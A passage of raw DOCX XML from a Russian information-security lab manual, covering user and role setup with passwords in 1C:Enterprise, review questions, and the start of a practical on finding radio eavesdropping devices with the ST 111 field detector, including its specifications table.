          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>разделе «Администрирование» выберем пункт «Пользователи» и введем пользователя с именем «Петров» с полными правами и интерфейсом «бухгалтерский» без паролей в окне «Пользователь», вкладки «Основные» и «Прочие», отметим пункт «Полные права» и поле «Основной интерфейс» переведем в состояние «Бухгалтерский».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pP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Введем второго пользователя с именем «Иванов» с правами «кассир» и интерфейсом «инткассир» и введем любой пароль в поле «Пароль», а затем в поле «Подтверждение пароля».</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Убеждаемся, что при входе в систему появляется возможность выбора пользователя, причем при входе для пользователя «Иванов» система потребует ввести пароль, а после входа отображается созданный интерфейс.</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Дополнительно в окне «Роль кассир: Права» возможно усиление защиты на уровне реквизитов документа. Так, открыв перечень реквизитов ПКО, выберем, например, реквизит «счеткасса», для которого возможно установить и отменить права «просмотр» и «редактирование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="241" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Кроме того, в режиме «Конфигуратор», выберем ветвь «Документы», раскроем реквизиты «ПКО», пункт «Данные». Раскроем пункт данные и в окне «Документ ПКО» выберем тот реквизит, который необходимо защитить, например, «валютаДокумента». Перейдем в ветвь «Формы», выберем пункт «Форма документа», поле «Валюта», вызовем окно «Свойства: Поле ввода» через контекстное меню. Убедимся, что в нем существует возможность изменения состояния каждого поля с помощью пунктов «видимость» и «доступность».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="198"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вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="364"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Обеспечение информационной безопасности информационных систем банков</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="364"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Обеспечение информационной безопасности электронной коммерции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="364"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Обеспечение информационной безопасности учетной деятельности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="230"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задания 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Запустить программу «1С: Предприятие» и продемонстрировать возможности решения вопросы информационной безопасности на уровне пользовательского интерфейса и в режиме «Конфигуратор».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1194" w:right="840" w:bottom="1440" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="page22"/>
      <w:bookmarkStart w:id="25" w:name="_Toc3808615"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:t xml:space="preserve"> работа №</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:t>. Обнаружение и локализация радиоизлучающих технических средств с помощью детектора поля ST 111.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t xml:space="preserve">Цель работы: научится применять </w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">детектор поля ST 111 для </w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:t>обнаружения и локализации радиоизлучающих технических средств</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve">Прибор </w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:t>ST 110 предназначен для обнаружения и локализации радиоизлучающих технических средств (РТС) предназначенных или используемых, в том числе, для несанкционированной передачи информации по радиоканалу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>К таким средствам, прежде всего, относят:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>радиомикрофоны;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> телефонные радиоретрансляторы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> радиостетоскопы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> видеокамеры с радиоканалом передачи информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> технические средства систем пространственного высокочастотного облучения в радиодиапазоне;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> радиомаяки систем слежения за перемещением объектов (людей, транспортных средств, грузов и т.п.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> сотовые телефоны и радиомодемы стандарта «GSM» и «DECT»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00876548">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00876548">
        <w:tab/>
        <w:t xml:space="preserve"> устройства передачи информации с использованием стандартов «BLUETOOTH» и «WLAN».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="934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 w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4678"/>
        <w:gridCol w:w="4664"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>Основной блок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>Диапазон частот, МГц</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>50-2500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>Пороговая чувствительность по входу, не более, дБм</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 75 (50 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 70 (1500 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 50 (2500 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>Динамический диапазон индикации, дБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>55 (50-2000 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>40 (2000-2500 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>Чувствительность частотомера, дБм</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 35 (50 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 50 (500 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00876548">
              <w:t>минус 20 (2500 МГц)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Погрешность измерения частоты, %</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0.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Частота среза ФНЧ, МГц</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750</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Внутренний источник питания</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Li-pol акк. 6&lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Потребляемый ток, мА, не более:</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65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
